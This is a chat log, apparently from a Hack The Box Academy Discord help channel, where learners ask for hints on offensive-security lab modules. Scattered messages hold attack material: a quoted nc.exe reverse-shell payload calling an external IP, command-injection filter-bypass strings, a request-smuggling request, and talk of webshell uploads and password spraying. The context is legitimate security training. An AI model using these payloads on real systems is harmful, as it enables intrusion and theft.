Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Also read #welcome to verify yourself

how long did it take for you ??? its been almost an hour for me still no luck

Thank you guys very much would like some extra help on the side if anyone can volunteer

Bro what

Bro what

<@&861185840277487616>

My bad

just delete that text man

Sorry about that guys

i believe it should not take this long

i dont think it should take this long for the password mutation question as everyone told that it takes approx 30 mins max also i AM using the given resources and also the pwnbox , could anyone please suggest if should wait or if i am doing something wrong ?

ssh is extremely slow. Are there alternatives?

the questions states ssh

Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the password for the user "sam". Once successful, log in with SSH and submit the contents of the flag.txt file as your answer.

Yeah but if you have like ftp running on the host you could also brute force ftp

Can anyone tell me what error it is?
Module: File Transfer
Topic : Window File Transfer Method

Linux:

yes i might try that , thankyou for the help

Windows:

If I cancel my subscription, will I lose my modules I own and VPN connection to the academy?

Nah you will not lose access to modules if u had buyed it with cubes, VPN Connection will get no affect.
btw it is module section, ask in General one

thank you.

Have you read your stuff in Linux?

yeah i am getting error in window.

Yeah… but have you read your output in Linux?

nah

Read what it’s doing and check what command you are passing in the Windows host

If I put ' in Accept header response is 500 internal server error is it exploitable or not.

[FIXED]
Kerberos Attack - Silver Ticket on Linux
The target is taking more than 10 mins to spawn, can someone from HTB confirm if this an issue?

i have read it, can you elaborate like a hint, where i am making mistake

Guys i have a question, when u are inyecting commands on a web app, the characters ||, ; , &, && etc are to concatenate ur command inyection or to bypass any filter?

make a series of commands to execute..
but sometime they also use to bypass blacklister(not very often)

Let's say when u try chars like /n, ||, ; you get a message like "malicious input" but when using &,&& you dont get the message, did you bypass any filter or those chars are just not blacklisted?

actually it didn't come in blacklist side..
bypass filters is often with some special chars like in %

I understand bypassing like for example ; is not allowed but when inyecting ${LS_COLORS:10:1} (Result in ;) you are allowed, so my question is, finding a character that u can use is the same as finding a way to inyect a character u are not suppose to use?

✅

It looks like you are serving you files in a Web directory. From the module notes Windows should resolve this when passing 'dir', but it is showing error. If you try to read it via certutil you will be able to do it

You can also use the browser if you want

Anyone done this IDA Analysis section on the Malware Analysis Module im having a WTF moment...

https://academy.hackthebox.com/module/227/section/2499

halfway down the walk thru we start to analyize RegOpenKeyExA API function and it says "lets deconstruct this function" but in IDA this appears to belong to sub_403250

(above the call), this is all quite new to me

nvm it looks like its preparing vars, args, etc to pass to the function...

Could use a rewording on the opening sentence (Lets deconstruct the code [and its relevant requisities] as it appears...)

have you found the solution? Encountering the same issue.

hello for the verb tempering part there are errors on burp I don’t know if it’s normal ?? https://academy.hackthebox.com/module/163/section/1544

Try different tools

Hey all,

Working on the HTTP ATTACKS -> TE.CL Question.

I've pretty much done and I also looked at the right way of doing it, however I get this issue. Instead of the "Invalid HTTP request line" as expected.

Any hints?

my request:

POST / HTTP/1.1
Host: IP:PPORT
Content-Length: 3
Transfer-Encoding: asdchunked

5
HELLO
0

Hi

Im working on responder machine tier1 when i reach the responder it keeps on listening for events and nothing happens what should i do?

#starting-point

oh, you probably don't have access. verify your account by following the steps in #welcome to get access

Would be great if anyone can confirm if there's an issue with it

Okay done

Thank you

So how should i fix my responder?

that's a question for #starting-point

Okay thank you

I tried with invoke-passwordsprayews, invoke-passwordsprayowa, ruler and the metasploit module owa... is there any other tool I should think of?

For Introduction to Windows Evasion - Static Analysis. It states after all checks pass a flag.txt should be created... however it has been a few minutes with no flag.txt. Is there a check I am potentially not seeing?

Can someone help me with the Advanced XSS and CSRF exploitation module - skill assessment? I can become moderator, perform XXS and request admin page, but get redirected to login page. I really don't know how to proceed...

Guys the submit buttons is not working for me how can I fix this?

your code still has to work

I submitted the flag and it was right but it didn't complete the module

You should look around to see what you can do as a moderator now that you have more permissions

My guess is you have some kind of adblocker running, or left a proxy extension enabled

Thanks, I already know one additional important thing, but doesn't look enough... the adblocker suggestion might explain... let's see...

the adblocker comment was for someone whose submit button didn't work

for you, you need to find what else you can do with your new privs

Nope I tried on two devices also to make sure

it's 100% something on your end

ah, as mentioned, as a moderation I unlocked a functionality, but doesn't look enough

it's enough.

sorry, I meant, yes, of course it must be enough and I could perform XXS through that, but the request to the admin page gives me as an answer a redirection to the login page...so it seems that something is wrong in the way I perform XXS, even if apparently works

Hey, did you get it figured out? I'm on the last exercise but I don't know what to look at anymore.

moderators aren't admins.

uhm, I thought about that. I couldn't find a way to become admin, but I found a way to post a task as admin, but it doesn't seem the way

There is only one type of algorithm that works for the automation to pass

check your privs

Then you might have something wrong in there. Just tried one of the tools you've mentioned and got a successful hit

i hate myself i cant decode my own file.

are you suggesting to find a way to become admin?

nope

Is it one of the convention I should follow, cause I tried with all variation of <companyname><year>! and <seasons><years>! from 2022 to 2024. For Mailsnipper I used the convention DOMAIN\username as indicated, but can not get a successful hit.

Try the tool that the module only mentions but doesn't show

ah ok, because I have already tried all of the options I had in mind

And you could try the default password in the module

i'd suggest reviewing the xss sections and think about what you can do

What could be the issue??

hard to say, not enough details. i see you exited the server and then tried to connect with the client, do you have the server running somewhere else?

Oh I see the problem. Server isn't running anywhere else.
Thanks

Hey there someone completed the SCCM module?

I am stuck in the first question of the skills assessments part of the Windows Event Logs and finding evil module. I see all ID 7 logs. I literally went one by one to see if one of them has an image path that is suspicious ALSO with the imageloaded’s path… Please I need some advice in this. THANKS

Question: By examining the logs located in the “C:\Logs\DLLHijack” directory, determine the process responsible for executing a DLL hijacking attack. Enter the process name as your answer. Answer format: _.exe

Attacking common applications: Attacking thick client side applications.

Windows PowerShell terminated with the following error:
The type initializer for 'System.Management.Automation.Runspaces.InitialSessionState' threw an exception.

Is this supposed to happen? I have to run a few scripts using powershell, however I can not open it.

Immediately when I open PowerShell it closes down.

I'd try running as admin and if that doesn't work probably respawn the target.

nope lol

I tried running it as admin and didn't work.

I might have to restart.

Ty for the advice.

Yep

I am missing something on Limited File Uploads exercise. I have been at it for days. Can I DM someone for help on this

i believe last time you posted your code it wasn't the same as the section, have you tried using the code that was provided?

didnt you get the answer?

dm the screenshot

No I never got it

sent

I believe I built my code wrong. Did a dotnet build which i believe I have to use msbuild however, on the dev box it does not look like it is recognized and i am unable to add it as an environmental variable on the dev box...

you don't need to change any env's

Yes I am using the code from the exercise

Can i dm you?

Use VS Code and compile the same way the module states.
You should get the flag

How do i type in general?

follow the instructions in #welcome

Dang i gotta do it on my pc thats annoying 😭

for anyone wondering, something was off with either my vm or proxies. Ended up getting it in pwnbox. Gonna spin up a fresh VM its a bout time anyway

thinking I may have messed up when I started using apt full-upgrade

going back to regular old upgrade

hi I am doing the password attacks module's AD section. I am on question 3. So basically, I need to do the fasttrack but I don't have fasttrack saved in the wordlists on the pwnbox. Does it have to be installed? Here's my terminal output:

┌─[us-academy-1]─[10.10.15.10]─[htb-ac-605555@htb-o1qua9zq2k]─[/usr/share/wordlists/seclists/Passwords/Default-Credentials]
└──╼ [★]$ crackmapexec smb 10.129.202.85 -u jmarston -p /usr/share/wordlists/fasttrack.txt
SMB         10.129.202.85   445    ILF-DC01         [*] Windows 10 / Server 2019 Build 17763 x64 (name:ILF-DC01) (domain:ILF.local) (signing:True) (SMBv1:False)
SMB         10.129.202.85   445    ILF-DC01         [-] ILF.local\jmarston:/usr/share/wordlists/fasttrack.txt STATUS_LOGON_FAILURE```

I checked there's no fasttrack in there

but the tutorial is saying to use fasttrack

find its github and download it

I found fasttrack.txt online

ok yes this is what I was gonna try next

ok thanks

great ok so password cracked

will do last question in section later tonight

guys on question + 0 Which kernel version is installed on the system? (Format: 1.22.3) i try command
uname -r and it says 6.5.0-13parrot1-amd64
as it needs format i put 6.5.13 even tried 6.5.0-13 and all possible formats none works it says incorrect answer, any help? or is it just bug?

What does it say if you use uname -a

Hi everyone, I am new, I am taking my frist steps into completing the fundamental paths. Right now I am the OS modules, starting with Linux. Enjoying it a lot so far.

No, probably not a bug. Try stripping off everything after and including the “-“. The Linux kernel version is the first three numbers

Hi I am not much familiar with Windows case, in Blind SQLi Module, RCE section
https://academy.hackthebox.com/module/177/section/1765

The payload is:
<snip>
c:\windows\tasks\nc.exe -nv 192.168.43.164 9999 -e c:\windows\system32\cmd.exe;

But in Note it is given
Note: If you prefer using powershell, you can of course have nc.exe run it instead of cmd.exe by using a command like cmd nc.exe -nv 192.168.43.164 9999 -e C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe

Is it cmd nc.exe or just nc.exe?
Why in the first payload it is not mentioned, Is it optional?

hi team i need some help im banging my head against a wall here, a gentle nudge would be greatly appreciated. Im currently working through Password Attacks, Credntial Hunting in Linux on the question: Examine the target and find out the password of the user Will. Then, submit the password as the answer. I have managed to get the correct SSH password for the user kira and logged in to the target, ive been able to use SCP to complete the file transfer of Firefox Decrypt 0.7.0 to the target but i am unable to run the file as Python isnt installed on the machine and i cannot install it via apt without sudo, ive also located some SSH keys via the bash history but dont know where to write them to if thats part of the puzzle, any help would be amazing ive been on this for days now

can you not decrypt it on your own machine?

Hello everyone. I'm trying to figure out this module NMAP Scripting Engine. I've run scans on every port with every script, but the only flag I get is the one from the previous module. What am I missing?

Stuck on Web Attacks > HTTP Verb Tampering > Bypassing Security Filters which instructs you to try different HTTP methods besides GET/POST. I went one further by actually creating a wordlist of all possible methods:

GET
HEAD
POST
PUT
DELETE
CONNECT
OPTIONS
TRACE
PATCH

When I attempt to fuzz for this, however, nothing happens:

ffuf -w http-verbs.txt:FUZZ -X FUZZ -u 'http://83.136.254.158:31243/index.php?filename=notes.txt%3b{cp,/flag.txt,./}%3b'
<SNIP>
 :: Method           : FUZZ
 :: URL              : http://83.136.254.158:31243/index.php?filename=notes.txt%3b{cp,/flag.txt,./}%3b
 :: Wordlist         : FUZZ: /home/htb-ac-1424625/Desktop/htb-docs/web-attacks/http-verbs.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

OPTIONS                 [Status: 200, Size: 1133, Words: 137, Lines: 29, Duration: 143ms]
PUT                     [Status: 200, Size: 1133, Words: 137, Lines: 29, Duration: 145ms]
GET                     [Status: 200, Size: 1133, Words: 137, Lines: 29, Duration: 151ms]
HEAD                    [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 150ms]
PATCH                   [Status: 200, Size: 1133, Words: 137, Lines: 29, Duration: 155ms]
TRACE                   [Status: 405, Size: 305, Words: 26, Lines: 10, Duration: 155ms]
DELETE                  [Status: 200, Size: 1133, Words: 137, Lines: 29, Duration: 618ms]
POST                    [Status: 200, Size: 1133, Words: 137, Lines: 29, Duration: 624ms]

Should I be using Burp Intruder instead of ffuf here or something?

The size is different

Yes, but the only different sizes I'm seeing here are HEAD (blank) and TRACE (405 Method Not Allowed). All the others attempted are Malicious input denied. What other filters are there?

im stuck on the very first module for the HTTP /download.php. im just not understanding the question and im so new at all of this that i simply dont know what to do even after reading 4x over. tho ive completed the other pwnboxs

Did those answers not work?

For the question

What answers? I'm on the student plan.

And no they didn't because they're the wrong status code.

Oh yeah I remember now

Get and post have different request formats

Got it with curl; thanks

your a legend, thank you

Skills Assessment - File Upload Attack

i'm stuck i'm trying to upload the webshell but i get this message "Only images are allowed" i'm using this name for the file "test.p---.j---" with content type: i-----/j--- and i'm adding the MIME-Type above the webshell payload any idea what i'm missing ?

Yes there is one type of file ur missing

i found the .php file and i read it but i can't see what's throwing the "Only images are allowed"

I couldn’t find out either but I could still get the flag

Might go check again

Hello everyone. I'm trying to figure out this module NMAP Scripting Engine. I've run scans on every port with every script, but the only flag I get is the one from the previous module. What am I missing?

Assalamu' Alaykum 🤍

Yesh

[MODULE]: Advanced XSS and CSRF exploitation
[SECTION]: skills assessment

Hello everyone!
Currently working on this module.
Was able to privesc to moderator, found a way to XSS, but getting error message on the last step.

Can I have a nudge?

module = Web cache poisoning
section = password reset poisoning
https://academy.hackthebox.com/module/189/section/2014 the interactsh.local vhost seems to not work, i tried a few reset but still nothing. i already change my host file to resolve it, i tried interactsh.local:thePort but nothing work, i waited 10 minutes for 2 instances.

any one please help here

Just change the first payload so it executes ps instead of cmd

hi all, feeling a bit stupid in the hard lab of the Footprinting module. Not sure how to say the least possible but it seems that my two assumptions are not holding (1. I need credentials to be able to do anything, and 2. I guess there's creds re-use from the medium lab), and I'm stuck at the moment. The slightest nudge would be appreciated

https://academy.hackthebox.com/module/112/section/1080

What steps have you tried so far?

Anyone completed CWEE ??
Could you help me?

should I dm you ? Not sure how much I can write here, though to be fair I haven't gotten very far

sure

what is a shorter rockyou?

You can find various shorten rockyou dictionary lists in seclists

If anyone has same issue, just use the damn PwnBox for this exercise. It works on there just Fine

Or you can custom it with filter

Hello guys, I am new here glad to join..

is it a known problem with the chemistry machine where you cannot access the webpage?

Wrong channel

Chemistry sounds like a box #boxes or challenge, #challenges

Hello! Anybody have any tips for solving the DNS Zone Transfers questions?

Intro Assembly Language > Registers, Address and Data types. As you can see from the image, that the author mentioned that all the addressing mode are happening in the fetching stage by mentioning "There are several types of address fetching (i.e., addressing modes) in the x86 architecture:" and the preceding sentence. But actually the addressing modes was happening in the "execute" stage right because in the fetch stage it is used to only fetch the next instruction address from the rip(for x86_64 architecture) and then fetch the instruction from the memory by the instruction memory address right? But after getting the instruction, it will then decode (at 'decode' stage) the instruction from the machine code to assembly code to understand the code. Finally in the 'execute' stage only it is used to retrieve the operands and perform the operation right? As specified in the Module. So the addressing mode is actually happening in the execute stage rather than fetching stage as mentioned in that above section?

Hi,

Module: Attacking Common Applications
Section: Exploiting Web Vulnerabilities in Thick-Client Applications
Section Link: https://academy.hackthebox.com/module/113/section/2164

I am working from the pwnbox. So far, I have managed to install Java version 8 on the pwnbox. I have also downloaded the fatty-client.jar file, extracted it, modified it and created a new jar file. I am using the command java -jar fatty-client-new.jar to start the application. But when I try to login using the provided credentials, I get Connection Error. For some reason, Wireshark is not starting on the pwnbox. Can anyone nudge me on what I am doing wrong?

can someone help me understanding OSI

guys on this "Credential Hunting in Windows" section

What credentials does Bob use with WinSCP to connect to the file server? (Format: username:password, Case-Sensitive)
how to run LaZagne.exe in windows?

LaZagne comes in pyton and it's written : "C:\Users\bob\Desktop> start lazagne.exe all"

7 layers
7: Application -> Data
6: Session
5: Presentation
4: Transport -> Sequences/TCP/UDP
3: Network -> Packet
2: Data Link/Link Layer -> Frame
1: Physical -> Electric signal/bits

Module: Command Injection
Section: Skill assessment
Can someone give me a nudge of what should I do?
I tried both copy, view (via LFI) and move.
Moving the flag (which everyone said no need to) will response with permission denied
Copying would have it flag as Malicious
And I see no hope for reading

I was thinking of encoding, but I knew if I did so that would makes no difference as I prob inputted blacklisted char/cmd in the payload

I think I triggered something different this time
lets hope I can get something of it

Im new to this, trying to do https://academy.hackthebox.com/module/35/section/219 this. Got to the question and I thought it would be 301 or 301 Moved Permanently.

Just a little lost

any idea how we can do this from winrm ? when RDP is not available

Hi.
This is my first message here.

When studying the modules, I try to replicate the steps both in the pwnbox provided by the academy and in my local VMs.
Recently, while trying to use odat in a section with OracleTNS, I encountered issues on one of my virtual machines due to the Python version.
In my current job as a developer, we often use "asdf" for different versions of Java, Node, and Python.
I just wanted to mention that in the end, this was the approach I used to be able to run odat on my VM. It might be useful for someone else as well.

I had issues with odat as well and ended up installing it w apt

pyenv is good too

Is anyone experiencing issues trying to connect to the HTB VPN/Machine on macOS?

In which module and section do you need this? Then I can look in my notes to see how I solved it

Windows Privilege Escalation > Windows Group Privileges > Windows Built-in Groups
Backup operator section
https://academy.hackthebox.com/module/67/section/601

It's more of a general question really, not related to the module, like what if you have winrm only access with no RDP ? In the module you do have RDP access. (diskshadow.exe seems to only work with RDP access, trying to spawn it inside evil-winrm does not work)

you have to run the file on the system

And, also add the host to etc/hosts file

use a script

diskshadow.exe /s <path to file containing the commands>

It did not work when I tried it

What system? On the target system? But how do I get into the target system, there are no credentials provided?

I think I definitely need to re-read the section.

Hello everyone can acnyone help me pls : Perform vhost discovery. What additional vhost exists? (one word)

Attacking Enterprise Networks | External Information Gathering

I take content length ||15157|| then i use that with ||fuff -fs 15157|| but there is a lot off subdomains

pls give me some hint

Encoding problem

But if you don’t have RDP and you think that PowerShell is killing anything you are passing, you can always gain a CMD session with nc.exe

But probably it’s encoding

i did try that 6.5.0 and all possible formats none works

Linux htb-isjpiy72dc 6.5.0-13parrot1-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.5.13-1parrot1 (2023-12-19) x86_64 GNU/Linux

do you know how to solve the encoding problem ? I simply create the file with the commands on my vm, transfer it over with smb then run it. Also I don't think nc.exe session would work either because it's not fully interactive, but I will give it a shot who knows

If you get a CMD session and pass the commands to shadow interactively you may get it

But use unix2dos on your script

Before transferring

It should work

many thanks, I will try it out

Did you get your answer from that?

Hey anyone knws how to fetch a flag from an IMAP server

it still says on the version i put incorrect

I need help with Intro to Assembly Language skills assessment task 1

I XORed all values of rax with the key in the rbx but the result doesn't seem like valid shellcode and can't execuate it

I’m at work so can’t respond until later. Are you running the command on your box or on the target? I assume the question has a target to spawn

In Introduction to Binary Fuzzing ->Glee with Klee->Question #2: I only find one vulnerability that is "Memory Error: Null page access". I am clearing missing something if anyone one has a hint of what I am doing wrong 🙂

Hi there! I am quite new to cyber security/ Linux and I have a question about one of the beginner modules. Would someone be able to help?

What is your question?

I am working through the Linux Fundamentals module in the System Information section. I am trying to use ssh to log into the htb-student account. I tried using ipconfig to find the computer's IP address but it didn't work and I tried using the IP address in the command prompt but that didn't work either. What am I doing wrong?

Did you use the VPN file to establish the connection?

No I spawned an instance of the pwnbox

I enter the password but it always says 'Password denied'

I never used pwnbox, so I am not sure how they are setup. But I would start by confirming that your pwnbox is able to ping the target computer.

Oh.. I just realised I was supposed to actually create a target

My bad

It happens to the best of us 🙂

when im running htb vm and im in ssh, running some command lines after some time it just freeezes like i wrote "find / -type f -name *.conf -user root -size +20k -newermt " and after this it just is frozen, nothing works no enter, backspace, nothing. vm works fine tho just that current cmd im working in is stuck, is it bug or what is wrong with it ?

It is slow for me too sometimes

no not just slow it just stuck frozen until u execute another cmd and do the same task again just to get it frozen again after couple of minutes, vm still works fine tho it just cmd that has this bug

Yeah it freezes for me too but it usually goes back to normal after a few seconds

idk why it does that

hi guys

iim stuck with Skill Assessment - Windows Event Logs & Finding Evil

By examining the logs located in the "C:\Logs\Dump" directory, determine if an ill-intended login took place after the LSASS dump. Answer format: Yes or No

Can anyone tell me how to do it?

hi guys i wanted to know that from where should i start ethical hacking like mr robot???

Well i want to become a pentester like ryan montgomery but i get confused from where to learn???? Please help me

Just try both

But you can look for logon events

What should i do if my friend got hacked

Contact support of the platform they got hacked on

Tried it. “Discord cannot do anything against compromised/hacked accounts” it said

Then that’s unfortunate

Create a new account and move on is the only option I guess

We can’t help you with this

K i was just wondering

dude idk why but i cant ping any of the HTB module ips in https://academy.hackthebox.com/module/67/section/637 WPE skills assessment

are the vpn servers just trashing right now

hi I am doing password attacks module's AD passwork attack section and crackmapexec is not recognized as a command here:

┌─[us-academy-1]─[10.10.15.10]─[htb-ac-605555@htb-ludqisjdzv]─[~]
└──╼ [★]$ crackmapexec
bash: cme: command not found
┌─[us-academy-1]─[10.10.15.10]─[htb-ac-605555@htb-ludqisjdzv]─[~]
└──╼ [★]$ sudo apt install crackmapexec
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Some packages could not be installed. This may mean that you have
requested an impossible situation or if you are using the unstable
distribution that some required packages have not yet been created
or been moved out of Incoming.
The following information may help to resolve the situation:

The following packages have unmet dependencies:
 crackmapexec : Depends: python3-neo4j but it is not installable
E: Unable to correct problems, you have held broken packages.
┌─[us-academy-1]─[10.10.15.10]─[htb-ac-605555@htb-ludqisjdzv]─[~]```

this is on pwnbox

netexec

ok

I just completed the Senior Web Penetration Tester role and I want to see how many others have finished this role. How can I do that?

you should've gotten a badge and that one says how many ppl have the same badge

I don't see it

click on share, then "Get a shareable link" then click that link

hello guys , i'm trying to solve the EvilCUPS box i've followed the ipsec video and i've downloaded the exploit from its github repo then when i want to execute the test print job of the my malicious machine to get a reverse shell i got this error on the cups dashboard "stopped
"Filter failed"" and when i go and see the python code i got this error too "Exception occurred during processing of request from ('10.10.11.40', 48740)
Traceback (most recent call last):
File "/usr/lib/python3.10/socketserver.py", line 683, in process_request_thread
self.finish_request(request, client_address)
File "/usr/lib/python3.10/socketserver.py", line 360, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/usr/lib/python3.10/socketserver.py", line 747, in init
self.handle()
File "/usr/lib/python3.10/http/server.py", line 425, in handle
self.handle_one_request()
File "/usr/lib/python3.10/http/server.py", line 413, in handle_one_request
method()
File "/home/hacker/.local/lib/python3.10/site-packages/ippserver/server.py", line 101, in do_POST
self.handle_ipp()
File "/home/hacker/.local/lib/python3.10/site-packages/ippserver/server.py", line 140, in handle_ipp
ipp_response = self.server.behaviour.handle_ipp(
File "/home/hacker/.local/lib/python3.10/site-packages/ippserver/behaviour.py", line 71, in handle_ipp
return command_function(ipp_request, postscript_file)
File "/home/hacker/.local/lib/python3.10/site-packages/ippserver/behaviour.py", line 163, in operation_print_job_response
self.handle_postscript(req, psfile)
File "/home/hacker/.local/lib/python3.10/site-packages/ippserver/behaviour.py", line 410, in handle_postscript
raise NotImplementedError
NotImplementedError

target connected, sending payload ..." so please anyone can help me

Can someone explain the answer format in ‘error based sql injections’ from advanced sql injections module? I have all the info I need but it doesn’t take the answer